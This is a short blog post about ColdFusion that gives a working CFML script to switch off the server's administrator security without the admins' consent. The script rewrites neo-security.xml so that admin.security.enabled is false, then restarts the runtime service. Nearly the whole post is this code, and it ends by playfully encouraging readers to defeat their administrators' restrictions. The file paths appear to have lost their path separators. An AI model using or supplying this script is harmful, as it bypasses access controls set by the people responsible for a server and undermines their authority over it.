Hacking ColdFusion – Disable Administrator Security

During MAX 2006 I attended the ColdFusion CFC Birds of a Feather. Someone was complaining about the fact that their administrators were too restrictive despite not understanding the ColdFusion service. They were unable to see CFC introspection because of an administrator password. So I suggested they disable security programmatically.

After thinking about it for awhile, I decided that it was an interesting challenge. I looked at it a couple different ways, and finally settled on this solution:

<!--- Grab the security file contents --->
<cffile action="read" file="#server.ColdFusion.rootdir#libneo-security.xml" variable="rawfilecontents" />

<!--- Convert it to a structure --->
<cfwddx action="wddx2cfml" input="#rawfilecontents#" output="loginfo" />

<!--- Change the setting --->
<cfset loginfo["admin.security.enabled"] = JavaCast("boolean", false) />

<!--- Convert back to WDDX --->
<cfwddx action="cfml2wddx" input="#loginfo#" output="fileToWrite" />

<!--- Write it back to the disk.  --->
<cffile action="write" addnewline="yes" file="#server.ColdFusion.rootdir#libneo-security.xml" output="#fileToWrite#" fixnewline="no" />

<!--- This seems to restart the server eventually.  I had to rerun it several times to get it to work.  --->
<cfset serverFactory = CreateObject("java", "coldfusion.server.ServiceFactory") />
<cfset runTimeService = serverFactory.RuntimeService />
<cfset runTimeService.ReStart() />

You have to run it a couple times before it kicks in.

Now, it is important to point out the following:

  1. If proper sandboxing is enabled, this won’t work.
  2. If proper IIS restrictions on CFIDEadministrator are set, this won’t work.
  3. You should never do this on a hosted server as it will probably violate your hosting agreement.
  4. I’m not advocating messing with your administrators.
  5. But you totally could.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s